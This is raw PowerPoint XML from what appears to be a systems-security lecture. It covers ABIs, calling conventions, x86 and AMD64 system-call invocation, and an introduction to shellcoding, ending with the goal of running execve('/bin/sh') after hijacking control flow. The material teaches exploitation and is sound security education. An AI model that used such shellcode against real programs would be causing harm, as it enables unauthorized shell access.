              <a:t>2’s complement, ASCII, string</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Intel ISA + basic instructions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Calling conventions </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>IA32 (i386), AMD64 (x86_64)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Part of Abstract Binary Interface (ABI)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Basic Buffer Overflow (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>BoF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>)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3F3C0-6A97-2D24-174B-D858C6A58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0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44B8-20A1-184A-A9BC-3315E3630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97A1C-BAF1-2A44-B752-93CF729AD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/>
              <a:t>System calls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>Shellcoding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> Intro</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Assembly 1-0-1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Inline assembly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>GNU Assembly (GAS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>pwntools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07DC3-00B2-B347-B92A-45A25D71F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41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32469-7BBA-3444-AB7D-1CA218F07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368"/>
            <a:ext cx="10515600" cy="953910"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Application Binary Interface (ABI): </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>How a Binary Runs on Computers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7CE5E-2F03-E548-830B-578A4D876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A8667-E97A-D14D-8462-D784FD87328E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7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A0576-F953-6C4E-964A-132EF275E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7768"/>
            <a:ext cx="5195131" cy="3574414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en-US"/>
              <a:t>A specification defining requirements for portability at binary level (i.e., executables)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>No recompilation or re-linking </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>E.g., Copy your binary and run!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>An executable will not run under a different OS on the same machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Interoperability </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr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1241C1-CAFE-5743-997A-1F072571462F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1612935" y="5579409"/>
            <a:ext cx="1270000" cy="5842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 Function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16EC7F-F4FE-DE42-A232-00BFA6C0593C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4040537" y="5578528"/>
            <a:ext cx="1270000" cy="5842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Assembly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Routine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870044-6FB2-0144-8196-CA76C25E82D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3037380" y="5797781"/>
            <a:ext cx="69426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1415F8A-B614-7147-8321-6B6340B397FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3037380" y="5950181"/>
            <a:ext cx="69426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EC3ACA6-D03A-3244-9120-929928C8F857}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3175679" y="5469181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Call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D2D117-B13C-514D-9304-498CD5A1E9BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3191825" y="5924781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Call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58DAAEE-A726-4B42-BE8F-925AD9F2E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318591"/>
            <a:ext cx="5443164" cy="19086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F90993-1039-BA4B-9B3F-29ADEAB58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767" y="2617444"/>
            <a:ext cx="5431382" cy="13195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4B1934-4C52-FE41-9EA4-0EF6F71DD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331" y="1344721"/>
            <a:ext cx="5443164" cy="123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75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32469-7BBA-3444-AB7D-1CA218F07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Binary Interface (ABI)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D59A-6339-A24A-9851-5EF9EC263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5714999" cy="4802187"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>ABI is a specification for </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>A  hardware platform + OS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>ABI defines the machine format</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>ABI is a step beyond API</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> Glibc API defines interface for the application interact with the OS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>API compatibility does not ensure runtime compatibility</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>E.g., Linux binaries for ARM and x86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7CE5E-2F03-E548-830B-578A4D876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A8667-E97A-D14D-8462-D784FD87328E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/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96B75B76-BCAA-E24C-A5A8-283E1AE12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803" y="1940719"/>
            <a:ext cx="5715000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44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C2A97D-DE18-E64B-BCB7-80AA1698C520}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1185333" y="4360419"/>
            <a:ext cx="4995333" cy="194363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11A33-C3E2-E746-9836-72F4B00D6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89600" cy="48958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/>
              <a:t>Specifications in ABI include:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>specific processor or processor family</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>ARM vs. x86, 32-bit vs. 64-bit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Any required processor features (e.g., SIMD instructions)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Data formats</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>E.g., Endian needs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Specific OS or OS family</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Object and executable file formats</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Register usage conventions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>Special purpose registers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>stack frame format</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>parameter passing, including function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" err="1"/>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>  / structure/union parameters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>return value passing, including </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" err="1"/>
              <a:t>fp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>/structure/union return values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7C2E1A-EAC8-524A-9E62-2B970B6F0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Binary Interface (ABI)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BECB4-AD46-A446-AD44-519BE5D40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A8667-E97A-D14D-8462-D784FD87328E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4C288F-6F6C-9F49-AF1E-7467977FB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03" y="2126457"/>
            <a:ext cx="5557097" cy="405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89645A29-3743-8A40-B9A6-D96D44F30E36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5831415" y="5946833"/>
            <a:ext cx="1392767" cy="877687"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -118062"/>
              <a:gd name="adj2" fmla="val -8150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Calling Convention</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="81478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8C9E3-249E-AE14-9D59-6560575E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Calls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F2B3F-12AA-FFC6-24A0-995CFB4D1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50789"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Can be considered as another calling conventions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Between user-land and kernel-land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51581-4F83-C8FF-587F-50B958EE8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D154DC-8C6E-0337-E190-C34F75187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47" y="2711013"/>
            <a:ext cx="9308342" cy="26617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BA722D-7C18-36F6-7C03-6D5A91BECEF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="976017" y="4318967"/>
            <a:ext cx="9297619" cy="104607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44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EBF1-B599-48A4-BD2D-C4C27AA4D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Invoking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>getuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>(): x86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B0066-A03D-4EC6-93DB-6B1576340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69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Set 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/>
              <a:t>as target system call number</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="en-US">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SYS_getegid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>,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  // 0x32 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Set arguments</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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ebx</a:t>
            </a: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2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000"/>
              <a:t>nd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>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ecx</a:t>
            </a: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3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000"/>
              <a:t>rd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>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edx</a:t>
            </a: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4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000"/>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>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esi</a:t>
            </a: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5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000"/>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>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edi</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Run</a:t>
            </a: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</a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> $0x80</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Line Callout 1 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC593551-21F1-5A4A-B6FF-993FF4F5B51A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="5601207"/>
            <a:ext cx="1761067" cy="610658"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 18750"/>
              <a:gd name="adj2" fmla="val -8333"/>
              <a:gd name="adj3" fmla="val 21556"/>
              <a:gd name="adj4" fmla="val -114554"/>
            </a:avLst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32-bit way</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3841454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EBF1-B599-48A4-BD2D-C4C27AA4D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Invoking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>getuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>(): AMD64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B0066-A03D-4EC6-93DB-6B1576340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69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Set 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rax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/>
              <a:t>as target system call number</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="en-US">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SYS_getegid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  // 0x6c </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Set arguments</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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rdi</a:t>
            </a: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2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000"/>
              <a:t>nd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>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rsi</a:t>
            </a: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3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000"/>
              <a:t>rd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>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rdx</a:t>
            </a:r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/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000"/>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>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%r10</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000"/>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>arg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>: 	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>%r8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Run</a:t>
            </a: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</a:rPr>
              <a:t>syscall</a:t>
            </a:r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4" name="Line Callout 1 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC593551-21F1-5A4A-B6FF-993FF4F5B51A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="5601207"/>
            <a:ext cx="1761067" cy="610658"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 18750"/>
              <a:gd name="adj2" fmla="val -8333"/>
              <a:gd name="adj3" fmla="val 21556"/>
              <a:gd name="adj4" fmla="val -114554"/>
            </a:avLst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64-bit way</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4083639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0A91C-0CDA-1BE2-A2DF-294473DC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Inline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5FA74-9F44-A49A-C725-9134F1105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52447"/>
            <a:ext cx="10515600" cy="1124516"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>codimd.syssec.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>/s/6pWA4-g2T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96021-43E0-D580-A9E5-49804DA9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9C3BE-8278-7C7A-8BDC-2A7ADE628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52624"/>
            <a:ext cx="7772400" cy="315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79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EFF11-91E3-5E1F-B94D-6B4CCB0BF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Shellcoding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90B1D-FB16-ABF8-7E71-7C89395D0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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Fira Code" panose="020B0809050000020004" pitchFamily="49" charset="0"/>
                <a:ea typeface="Fira Code" panose="020B0809050000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>get_a_shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Fira Code" panose="020B0809050000020004" pitchFamily="49" charset="0"/>
                <a:ea typeface="Fira Code" panose="020B0809050000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:highlight>
                <a:srgbClr val="C0C0C0"/>
              </a:highlight>
              <a:latin typeface="Fira Code" panose="020B0809050000020004" pitchFamily="49" charset="0"/>
              <a:ea typeface="Fira Code" panose="020B0809050000020004" pitchFamily="49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ea typeface="Fira Code" panose="020B0809050000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Load your payload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ea typeface="Fira Code" panose="020B0809050000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Hijack control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B0BD1-BEFA-246D-B41B-A88192C6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96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 “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>get_a_shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>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/>
              <a:t>In the real attack case, no victim will prepare </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>get_a_shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>for you </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Shellcode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Assembly code snippet that runs a shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Wants to do</a:t>
            </a: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  <a:cs typeface="Courier New" panose="020703090202050204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  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="020703090202050204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  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="020703090202050204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  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>());</a:t>
            </a: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  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(“/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>”, 0, 0);</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2736248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E8C6E9-CF46-CC42-8F0A-4421450FB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39D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>16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8F2324B-17D6-DE4E-8327-DEBD2E0E37C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
